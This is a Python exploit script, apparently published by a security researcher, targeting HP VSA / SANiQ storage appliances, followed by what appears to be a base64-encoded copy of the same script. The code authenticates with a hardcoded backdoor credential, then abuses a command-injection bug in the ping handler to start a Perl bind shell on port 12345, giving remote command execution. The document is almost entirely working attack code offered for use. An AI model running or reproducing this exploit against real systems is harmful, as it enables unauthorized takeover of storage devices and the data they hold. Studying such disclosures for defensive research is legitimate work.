#!/usr/bin/python
 
''' ==================================
          Pseudo documentation
================================== '''
 
# HP VSA / SANiQ Hydra client
# Nicolas Grégoire <nicolas.gregoire@agarri.fr>
# v0.5
 
''' ==================================
          Target information
================================== '''
 
HOST = '192.168.201.11' # The remote host
PORT = 13838        # The hydra port
 
''' ==================================
             Imports
================================== '''
 
import getopt
import re
import sys
import binascii
import struct
import socket
import os
 
''' ==================================
        Define functions
================================== '''
 
# Some nice formatting
def zprint(str):
    print '[=] ' + str
 
# Define packets
def send_Exec():
    zprint('Send Exec')
 
    # RESTRICTIONS
    # You can't use "/" in the payload
    # No Netcat/Ruby/PHP, but telnet/bash/perl are available
 
    # METASPLOIT PAYLOAD
    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
 
    # COMMAND INJECTION BUG
    data = 'get:/lhn/public/network/ping/127.0.0.1/foobar;' + cmd + '/'
 
    # EXPLOIT
    zprint('Now connect to port 12345 of machine ' + str(HOST))
    send_packet(data)
 
def send_Login():
    zprint('Send Login')
    data = 'login:/global$agent/L0CAlu53R/Version "8.5.0"' # Backdoor
    send_packet(data)
 
# Define the sending function
def send_packet(message):
 
    # Add header
    ukn1 = '\x00\x00\x00\x00\x00\x00\x00\x01'
    ukn2 = '\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x14\xff\xff\xff\xff'
    message = message + '\x00'
    data = ukn1 + struct.pack('!I', len(message)) + ukn2 + message
 
    # Send & receive
    s.send(data)
    data = s.recv(1024)
    zprint('Received : [' + data + ']')
 
''' ==================================
           Main code
================================== '''
 
# Print bannner
zprint('HP Hydra client')
zprint('Attacking host ' + HOST + ' on port ' + str(PORT))
 
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))
 
# Attack !
send_Login()
send_Exec()
 
# Deconnect
s.close
 
# Exit
zprint('Exit')
 

IyEvdXNyL2Jpbi9weXRob24KIAonJycgPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQogICAgICAgICAgUHNldWRvIGRvY3VtZW50YXRpb24KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAnJycKIAojIEhQIFZTQSAvIFNBTmlRIEh5ZHJhIGNsaWVudAojIE5pY29sYXMgR3LDqWdvaXJlIDxuaWNvbGFzLmdyZWdvaXJlQGFnYXJyaS5mcj4KIyB2MC41CiAKJycnID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KICAgICAgICAgIFRhcmdldCBpbmZvcm1hdGlvbgo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICcnJwogCkhPU1QgPSAnMTkyLjE2OC4yMDEuMTEnICMgVGhlIHJlbW90ZSBob3N0ClBPUlQgPSAxMzgzOCAgICAgICAgIyBUaGUgaHlkcmEgcG9ydAogCicnJyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiAgICAgICAgICAgICBJbXBvcnRzCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gJycnCiAKaW1wb3J0IGdldG9wdAppbXBvcnQgcmUKaW1wb3J0IHN5cwppbXBvcnQgYmluYXNjaWkKaW1wb3J0IHN0cnVjdAppbXBvcnQgc29ja2V0CmltcG9ydCBvcwogCicnJyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiAgICAgICAgRGVmaW5lIGZ1bmN0aW9ucwo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICcnJwogCiMgU29tZSBuaWNlIGZvcm1hdHRpbmcKZGVmIHpwcmludChzdHIpOgogICAgcHJpbnQgJ1s9XSAnICsgc3RyCiAKIyBEZWZpbmUgcGFja2V0cwpkZWYgc2VuZF9FeGVjKCk6CiAgICB6cHJpbnQoJ1NlbmQgRXhlYycpCiAgICAgCiAgICAjIFJFU1RSSUNUSU9OUwogICAgIyBZb3UgY2FuJ3QgdXNlICIvIiBpbiB0aGUgcGF5bG9hZAogICAgIyBObyBOZXRjYXQvUnVieS9QSFAsIGJ1dCB0ZWxuZXQvYmFzaC9wZXJsIGFyZSBhdmFpbGFibGUKIAogICAgIyBNRVRBU1BMT0lUIFBBWUxPQUQKICAgIGNtZCA9ICJwZXJsIC1NSU8gLWUgJyRwPWZvcmsoKTtleGl0LGlmJHA7JGM9bmV3IElPOjpTb2NrZXQ6OklORVQoTG9jYWxQb3J0LDEyMzQ1LFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw+JyIKIAogICAgIyBDT01NQU5EIElOSkVDVElPTiBCVUcKICAgIGRhdGEgPSAnZ2V0Oi9saG4vcHVibGljL25ldHdvcmsvcGluZy8xMjcuMC4wLjEvZm9vYmFyOycgKyBjbWQgKyAnLycKIAogICAgIyBFWFBMT0lUCiAgICB6cHJpbnQoJ05vdyBjb25uZWN0IHRvIHBvcnQgMTIzNDUgb2YgbWFjaGluZSAnICsgc3RyKEhPU1QpKQogICAgc2VuZF9wYWNrZXQoZGF0YSkKIApkZWYgc2VuZF9Mb2dpbigpOgogICAgenByaW50KCdTZW5kIExvZ2luJykKICAgIGRhdGEgPSAnbG9naW46L2dsb2JhbCRhZ2VudC9MMENBbHU1M1IvVmVyc2lvbiAiOC41LjAiJyAjIEJhY2tkb29yCiAgICBzZW5kX3BhY2tldChkYXRhKQogCiMgRGVmaW5lIHRoZSBzZW5kaW5nIGZ1bmN0aW9uCmRlZiBzZW5kX3BhY2tldChtZXNzYWdlKToKIAogICAgIyBBZGQgaGVhZGVyCiAgICB1a24xID0gJ1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAxJwogICAgdWtuMiA9ICdceDAwXHgwMFx4MDBceDAwJyArICdceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCcgKyAnXHgwMFx4MDBceDAwXHgxNFx4ZmZceGZmXHhmZlx4ZmYnCiAgICBtZXNzYWdlID0gbWVzc2FnZSArICdceDAwJwogICAgZGF0YSA9IHVrbjEgKyBzdHJ1Y3QucGFjaygnIUknLCBsZW4obWVzc2FnZSkpICsgdWtuMiArIG1lc3NhZ2UKIAogICAgIyBTZW5kICYgcmVjZWl2ZQogICAgcy5zZW5kKGRhdGEpCiAgICBkYXRhID0gcy5yZWN2KDEwMjQpCiAgICB6cHJpbnQoJ1JlY2VpdmVkIDogWycgKyBkYXRhICsgJ10nKQogCicnJyA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiAgICAgICAgICAgTWFpbiBjb2RlCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gJycnCiAKIyBQcmludCBiYW5ubmVyCnpwcmludCgnSFAgSHlkcmEgY2xpZW50JykKenByaW50KCdBdHRhY2tpbmcgaG9zdCAnICsgSE9TVCArICcgb24gcG9ydCAnICsgc3RyKFBPUlQpKQogCiMgQ29ubmVjdApzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQpzLnNldHRpbWVvdXQoMzApCnMuY29ubmVjdCgoSE9TVCwgUE9SVCkpCiAKIyBBdHRhY2sgIQpzZW5kX0xvZ2luKCkKc2VuZF9FeGVjKCkKIAojIERlY29ubmVjdApzLmNsb3NlCiAKIyBFeGl0CnpwcmludCgnRXhpdCcpCg==